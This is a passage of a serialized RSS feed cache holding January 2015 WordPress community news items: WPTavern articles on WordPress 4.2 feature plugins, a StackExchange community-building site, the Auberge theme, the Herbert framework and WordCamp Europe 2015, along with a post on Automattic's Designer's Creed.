communication regarding their progress on the <a title=\"https://make.wordpress.org/core/\" href=\"https://make.wordpress.org/core/\">Make Core</a> blog. This issue is being addressed with weekly updates that explain what&#8217;s changed, things to test, and where focus is needed. The following plugins are candidates that may be included in 4.2:</p>\n<ul>\n<li><a title=\"https://wordpress.org/plugins/press-this/\" href=\"https://wordpress.org/plugins/press-this/\">Press This</a> &#8211; Uses the <a title=\"https://make.wordpress.org/core/tag/press-this/\" href=\"https://make.wordpress.org/core/tag/press-this/\">Press This tag</a> on the Make Core blog.</li>\n<li><a title=\"https://wordpress.org/plugins/customizer-theme-switcher/\" href=\"https://wordpress.org/plugins/customizer-theme-switcher/\">Customizer Theme Switcher</a> &#8211; Uses the <a title=\"https://make.wordpress.org/core/tag/customizer-theme-switcher/\" href=\"https://make.wordpress.org/core/tag/customizer-theme-switcher/\">Customer Theme Switcher</a> tag on the Make Core blog.</li>\n</ul>\n<h2>Improved Testing Opportunities</h2>\n<p>If you browse to the Add New plugins screen in a development version of WordPress, you&#8217;ll see a Beta Testing tab. The tab provides easy access to feature plugins that are currently in development. My primary gripe with testing feature plugins is that they&#8217;re usually not synched with their Github counterparts where most of the development occurs.</p>\n<p>WordPress core developer, Dion Hulse, <a title=\"https://github.com/dd32/Github-to-WordPress-Plugins-Sync\" href=\"https://github.com/dd32/Github-to-WordPress-Plugins-Sync\">created a script</a> specifically to sync feature plugins on Github to the WordPress plugin directory. This allows feature plugins to have nightly releases which are available from the plugin directory. This small but important change makes it a lot easier to keep up with and upgrade feature plugins.</p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/WP42BetaTestingTab.png\" rel=\"prettyphoto[38159]\"><img class=\"size-full wp-image-38225\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/WP42BetaTestingTab.png?resize=1025%2C382\" alt=\"WordPress 4.2 Feature Plugin Beta Testing Tab\" /></a>WordPress 4.2 Feature Plugin Beta Testing Tab\n<p>It&#8217;s still early in the development cycle, but I&#8217;m impressed with Jaynes organizational abilities. He&#8217;s addressed some of the largest pain points to the feature plugin process. If the changes put the experimental model back on track, future lead developers will have an easier time managing the program.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 23:32:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"WPTavern: StackExchange Community Building Beta Provides a Valuable Resource for Digital Community Managers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38086\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"http://wptavern.com/stackexchange-community-building-beta-provides-a-valuable-resource-for-digital-community-managers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5295:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/plants.jpg\" rel=\"prettyphoto[38086]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/plants.jpg?resize=1025%2C505\" alt=\"plants\" class=\"aligncenter size-full wp-image-38240\" /></a></p>\n<p>Online community building is like gardening. Whether you&#8217;re running an active blog, moderating forums, or managing a social network, you will encounter challenges in maintaining growth. Experienced community builders have a wealth of knowledge to share with those who are new to it, especially when it comes to recognizing and mitigating toxic elements, fertilizing to encourage growth, and responding to community changes.</p>\n<p>Last year, StackExchange opened a <a href=\"http://communitybuilding.stackexchange.com/\" target=\"_blank\">Community Building beta</a> to test the waters for a new Q&amp;A site dedicated to building, administering, managing, and cultivating digital communities. It&#8217;s been in beta for approximately six months and has attracted 877 users with an impressive 100% of questions answered.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/community-building-stackexchange.png\" rel=\"prettyphoto[38086]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/community-building-stackexchange.png?resize=765%2C549\" alt=\"community-building-stackexchange\" class=\"aligncenter size-full wp-image-38214\" /></a></p>\n<p>While the Q&amp;A site is not oriented around WordPress (<a href=\"http://wptavern.com/wordpress-stackexchange-thrives-in-2014-with-17-million-page-views-and-14k-new-questions\" target=\"_blank\">WP Developers have their own thriving Stackexchange</a>), many of the questions and topics relate to issues that WordPress site managers deal with every day:</p>\n<ul>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/965/how-do-you-choose-the-software-that-runs-your-community\" target=\"_blank\">How do you choose the software that runs your community?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/964/cant-watch-24x7-how-do-we-keep-comments-under-control\" target=\"_blank\">Can&#8217;t watch 24&#215;7; how do we keep comments under control?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/840/how-to-handle-a-shill\" target=\"_blank\">How to handle a shill?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/972/forum-war-because-of-a-new-rule-and-a-banned-user\" target=\"_blank\">Forum war because of a new rule and a banned user</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/1009/pitfalls-to-avoid-when-transferring-community-ownership\" target=\"_blank\">Pitfalls to avoid when transferring community ownership?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/986/do-long-term-icebreaker-threads-foster-quality-discussion\" target=\"_blank\">Do long-term “icebreaker” threads foster quality discussion?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/950/how-and-when-do-i-attract-experts-to-a-young-site-that-doesnt-yet-have-much-exp\" target=\"_blank\">How and when do I attract experts to a young site that doesn&#8217;t yet have much expert content?</a></li>\n</ul>\n<p>WordPress users have a diverse array of community building software available to them for creating interactive comments, forums, and social networking sites. These plugins make it possible for anyone to build a community, even with very little technical knowledge. However, even with the best tools at your disposal, a community is an organic thing that requires skill and dedication to cultivate.</p>\n<p>New community managers are eager to learn how to chase rabbits and moles out of their gardens while not disrupting community growth, as evidenced by the many questions submitted regarding managing user behavior. The &#8220;<a href=\"http://communitybuilding.stackexchange.com/questions/tagged/problem-users\" target=\"_blank\">problem-users</a>&#8221; tag is so far one of the most popular on the site, followed by other related topics, such as conflict resolution, new users, content curation, forums, and site growth.</p>\n<p>This new Q&amp;A site is still <a href=\"http://area51.stackexchange.com/proposals/52070/moderators\" target=\"_blank\">navigating through its beta period</a> but still needs to demonstrate progress. So far, the beta is healthy in terms of questions getting answered, but it needs to generate more questions on a daily basis, attract more experienced members, and gain more traffic before it can graduate from its final beta.</p>\n<p>Part of the StackExchange mission is to provide answers without distraction for users who are asking practical, detailed questions. The new <a href=\"http://communitybuilding.stackexchange.com/\" target=\"_blank\">Community Building beta</a> site is not a place to vent but rather a place to get solid, actionable advice from experienced community managers. This site is an excellent resource for anyone who is involved in online community building, even if you simply have a blog that receives a steady stream of comments. If you want to contribute, sign up at <a href=\"http://stackexchange.com/\" target=\"_blank\">StackExchange</a> to get started.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 23:11:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Auberge: A Beautiful Free Restaurant Theme for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38161\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"http://wptavern.com/auberge-a-beautiful-free-restaurant-theme-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4671:\"<p>Restaurant themes don&#8217;t often land in the WordPress Themes Directory. In fact, there are barely <a href=\"https://wordpress.org/themes/search.php?q=restaurant\" target=\"_blank\">a dozen</a> listed among the 3,000+ themes on WordPress.org.</p>\n<p>One problem with many commercial restaurant themes is that they are usually marketed as a complete package with everything built into the theme, including menu management. The lack of separation of menu data from the theme means that users are locked into that theme and their content is not transferable.</p>\n<p>That&#8217;s not the case with <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">Auberge</a>, a new free theme from Oliver Juhas of <a href=\"http://www.webmandesign.eu/\" target=\"_blank\">WebMan Design</a>. Last week we featured Juhas&#8217; <a href=\"http://wptavern.com/modern-a-beautiful-free-blog-and-portfolio-theme-for-wordpress\" target=\"_blank\">Modern</a> theme, which was built to showcase portfolios. Modern requires Jetpack for managing portfolio posts, and Auberge takes the same approach for menus.</p>\n<p>The theme&#8217;s home page features a large header image, with blog posts and/or an optional food menu preview displayed beneath.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge.jpg\" rel=\"prettyphoto[38161]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge.jpg?resize=880%2C660\" alt=\"auberge\" class=\"aligncenter size-full wp-image-38163\" /></a></p>\n<p>Check out the <a href=\"http://themedemos.webmandesign.eu/auberge/\" target=\"_blank\">live demo</a> to see how the <a href=\"http://themedemos.webmandesign.eu/auberge/menu/\" target=\"_blank\">menu page</a> is divided into sections. The menus are responsive and each item can be assigned an image, price, and description.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge-menu.jpg\" rel=\"prettyphoto[38161]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge-menu.jpg?resize=1025%2C752\" alt=\"auberge-menu\" class=\"aligncenter size-full wp-image-38183\" /></a></p>\n<p>Auberge requires the <a href=\"https://wordpress.org/plugins/webman-amplifier/\" target=\"_blank\">WebMan Amplifier</a> plugin, available on WordPress.org, in order to extend the theme to include the custom &#8220;ingredients&#8221; taxonomy and recipe metaboxes.  The theme also requires <a href=\"http://jetpack.me/\" target=\"_blank\">Jetpack</a> to support many of the features you see in the demo, including:</p>\n<ul>\n<li>Food menu posts</li>\n<li>Featured content setup (banner area)</li>\n<li>Tiled galleries</li>\n<li>Image lightbox zooming effect</li>\n<li>Infinite Scroll</li>\n<li>Sharing buttons</li>\n<li>Site icon, favicon, and image logo</li>\n<li>Related posts, CDN, etc</li>\n</ul>\n<p>Auberge utilizes WordPress&#8217; native customizer to offer layout options for the placement of the blog posts and food menu sections on the home page. You can also customize the header background and text colors, accent color, footer and widget colors. The customizer also contains options to set the basic font size and select Google Font combinations based on recommendations from the <a href=\"http://femmebot.github.io/google-type/\" target=\"_blank\">Google Web Fonts Typographic Project</a>.</p>\n<p>If you like the layouts seen in the demo site, the theme&#8217;s author has prepared all the markup for each page to copy into your pages. You can find this in the &#8220;Demo Content Page Layouts&#8221; section of the theme&#8217;s <a href=\"http://www.webmandesign.eu/manual/auberge/\" target=\"_blank\">documentation</a>.</p>\n<p>Auberge has support for post formats as well as the unique ability to split posts and pages into <a href=\"http://themedemos.webmandesign.eu/auberge/post-parts/\" target=\"_blank\">multiple parts</a>. It also supports Schema.org markup, Google Recipe View, and Theme Hook Alliance action hooks.</p>\n<p>Auberge was built based on Automattic&#8217;s <a href=\"http://underscores.me/\" target=\"_blank\">Underscores</a> starter theme. Juhas designed it to be lean, so any extra functionality comes in the form of plugins. The theme itself contains no shortcodes, sliders, or page builders.</p>\n<p>If you&#8217;re looking for a restaurant or cafe theme that includes menu content the right way, <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">Auberge</a> is a solid option. It allows you to select a different theme further down the road without losing all of your content. You can find it via your admin themes browser or <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">download</a> it directly from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 20:20:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: Designer’s Creed\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44644\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"http://ma.tt/2015/01/designers-creed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1790:\"<p>You might remember a <a href=\"http://ma.tt/2011/09/automattic-creed/\">few years back I talked about why Automattic has a creed, and shared ours</a>. Here it is again:</p>\n<blockquote><p>I will never stop learning. I won&#8217;t just work on things that are assigned to me. I know there&#8217;s no such thing as a status quo. I will build our business sustainably through passionate and loyal customers. I will never pass up an opportunity to help out a colleague, and I&#8217;ll remember the days before I knew everything. I am more motivated by impact than money, and I know that Open Source is one of the most powerful ideas of our generation. I will communicate as much as possible, because it&#8217;s the oxygen of a distributed company. I am in a marathon, not a sprint, and no matter how far away the goal is, the only way to get there is by putting one foot in front of another every day. Given time, there is no problem that&#8217;s insurmountable.</p></blockquote>\n<p>One of the parts of <a href=\"http://automattic.com/\">Automattic</a> that has grown the most over the past few years is our design corps, now over two dozen people. This group, led by creative director <a href=\"http://davemart.in/\">Dave Martin</a>, has come up with a supplemental Designer&#8217;s Creed for followers of their craft at A8C:</p>\n<blockquote><p>I take pride in my craft. I ensure that everyone — regardless of ability or device — can use my designs. I routinely ask for feedback, even when it’s uncomfortable. I regularly watch people use my designs, because testing leads to clarity. I will never stop at “good enough.”</p></blockquote>\n<p><a href=\"http://davemart.in/2015/01/24/the-automattic-designers-creed/\">You can read more about it on Dave&#8217;s blog. »</a></p>\n<p>&nbsp;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 01:15:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"WPTavern: Herbert: A New WordPress Plugin Framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38040\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://wptavern.com/herbert-a-new-wordpress-plugin-framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4069:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/herbert.jpg\" rel=\"prettyphoto[38040]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/herbert.jpg?resize=831%2C405\" alt=\"herbert\" class=\"aligncenter size-full wp-image-38128\" /></a></p>\n<p>WordPress plugin authors have a great deal of liberty when it comes to structuring and organizing their code. There&#8217;s no prescribed file structure, so when you look under the hood of a plugin, you often need to poke around a bit to find out how the author is organizing things.</p>\n<p>Jason Agnew found this to be confusing when he went to build his first WordPress plugin. Agnew is the technical director at <a href=\"http://bigbitecreative.com/\" target=\"_blank\">Big Bite Creative</a>, located in Middlesbrough, England. He often collaborates with both front and back end developers on projects, which drove him to find a better way to write plugins that are organized for multiple team members.</p>\n<p>This week Agnew introduced <a href=\"http://getherbert.com/\" target=\"_blank\">Herbert</a>, a new open source framework for building WordPress plugins. &#8220;We believe the current approach to building plugins is unorganized and difficult to understand,&#8221; Agnew said. &#8220;It makes working in teams or taking over from a previous developer time consuming. Its early days for Herbert but our aim is to solve this.&#8221;</p>\n<p>Prior to creating Herbert with his team, Agnew did his homework to see if there was an existing tool to solve this problem. He discovered the <a href=\"http://wptavern.com/wordpress-plugin-boilerplate-3-0-released-with-new-community-website\" target=\"_blank\">WordPress Plugin Boilerplate</a> project, but determined that it wouldn&#8217;t work for his agency&#8217;s needs. &#8220;Although WPPB would be a great starting point, it seemed best suited to the quick development of smaller plugins,&#8221; Agnew said. &#8220;We needed something more suited to scale.&#8221;</p>\n<p>He checked out some of the most popular WordPress plugins, hoping to find a common thread among them for a semantic, structured method of plugin creation. &#8220;To our surprise, there wasn’t any sense of uniformity or consistency of implementation among them,&#8221; he said. At that point, he rallied his team to write their own WordPress plugin framework.</p>\n<p>The open source <a href=\"http://getherbert.com/\" target=\"_blank\">Herbert</a> project was born out of this effort. The framework aims to keep business logic separate from template code, so that back and frontend developers aren&#8217;t tripping over each other. &#8220;It offers a file structure to keep your code organised, with a solution as simple as all your routes belonging in the plugin/routes.php file,&#8221; Agnew said. &#8220;It no longer ties you or your development team to the WordPress Database Object ($wpdb), allowing you to use the power and effectiveness of <a href=\"http://laravel.com/docs/4.2/eloquent\" target=\"_blank\">Laravel’s Eloquent ORM</a> to handle your database queries.&#8221;</p>\n<p>Herbert utilizes Composer to handle the framework&#8217;s dependencies. Template code is stored in <a href=\"http://getherbert.com/dev/views\" target=\"_blank\">views</a>, which uses the <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig</a> PHP templating engine. The framework may not be everyone&#8217;s cup of tea. However, if you like separating your code into routes, views, and controllers, then Herbert may save you some time when spinning up new plugins.</p>\n<p>The Big Bite Creative team plans to maintain the framework and will add plugin examples in the future. &#8220;We plan to introduce an interface to the WordPress post object for Eloquent, along with tests for your code,&#8221; Agnew said. They are also considering adding a WordPress-specific frontend framework to work alongside Herbert. The project is open to contribution, so feel free to fork Herbert on <a href=\"https://github.com/getherbert/herbert/\" target=\"_blank\">GitHub</a> and send code back to the team.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 23:55:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Chris Lema’s Session From PressNomics 3 on Managing Time and Energy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38135\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://wptavern.com/chris-lemas-session-from-pressnomics-3-on-managing-time-and-energy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:968:\"<p>One of my favorite sessions at <a title=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\" href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\">PressNomics 3</a> is now <a title=\"https://www.youtube.com/watch?v=KD9XtifLp9Y\" href=\"https://www.youtube.com/watch?v=KD9XtifLp9Y\">available to watch for free</a> on YouTube. Although sessions weren&#8217;t recorded or live streamed, Chris Lema used his own gear to record his presentation. He shares the lessons he&#8217;s learned throughout his career on managing time and energy.</p>\n<p>One of my favorite tips is writing down three things you want to get done each day. Each completed task builds confidence and over time, you end up with a lot of accomplishments. So far, the technique is working and as long as I complete two out of three tasks each day, I feel pretty good about myself.</p>\n<p><span class=\"embed-youtube\"></span></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 22:23:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WPTavern: Seville, Spain to Host WordCamp Europe 2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38031\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"http://wptavern.com/seville-spain-to-host-wordcamp-europe-2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3322:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/seville.jpg\" rel=\"prettyphoto[38031]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/seville.jpg?resize=1025%2C505\" alt=\"seville\" class=\"aligncenter size-full wp-image-38107\" /></a></p>\n<p>The WordCamp Europe organization team <a href=\"http://europe.wordcamp.org/2015/wceu-2015-lets-go/\" target=\"_blank\">announced</a> today that the 2015 event will be held in Seville, Spain from June 26 – 28 at the <a href=\"http://www.hotelbarcelorenacimiento.com/\" target=\"_blank\">Barceló Gran Hotel Renacimiento</a>. Last year&#8217;s <a href=\"http://wptavern.com/wordpress-beyond-boundaries-a-recap-of-wordcamp-europe-2014\" target=\"_blank\">WordCamp in Sofia, Bulgaria</a> was a tremendous success with nearly 800 attendees, a world-class speaker lineup, and a strong local community of volunteers.</p>\n<p>Ordinarily, the WCEU organizers select a host city based on applications from various European WordPress communities after an open call. However, this year is an exception. WordCamp Central prevailed upon the team to have the event in late spring or summer in order to accommodate WordCamp US, which is expected to take place in the fall.</p>\n<p>&#8220;As we had to move WordCamp Europe to the first half of the year, we were quite limited in time,&#8221; organizer Petya Raykovska said. &#8220;So instead of publishing an open call for applications, we decided to reach out to some of the best established WordPress communities in Europe that have experienced teams of local organizers and asked them to prepare bids to host WCEU 2015. We received three very good applications from three different teams.&#8221;</p>\n<p>The WCEU organization team landed on Seville after considering various factors, such as the local organizers&#8217; preparation of the budget and venue research. &#8220;We chose Seville because of the excellent job they did with the application,&#8221; Raykovska said. &#8220;But also because of the great, experienced local team, because it’s a great location with a very different vibe from Sofia &#8211; it’s affordable, well connected with the rest of Europe, and has a very strong local WordPress community.&#8221;</p>\n<p>The WordPress community in Seville has held a local <a href=\"https://twitter.com/wcsevilla\" target=\"_blank\">WordCamp</a> for the past several years. The city&#8217;s metropolitan area has approximately 1.5 million residents, making it a decent-sized city for hosting an event. Attendees should expect to pack for warm weather, as the Seville&#8217;s average high temperatures in the summer often reach above 35 °C.</p>\n<p><a href=\"http://siobhanmckeown.com/\" target=\"_blank\">Siobhan McKeown</a> will be leading a team of 18 <a href=\"http://europe.wordcamp.org/2015/organizers/\" target=\"_blank\">organizers</a> for the 2015 event, including five experienced local organizers and a global team of organizers from all over Europe.</p>\n<p>Tickets will go on sale at the beginning of February, and the organization team will be calling for speakers and sponsors in the next few days. Unlike last year&#8217;s event, WordCamp 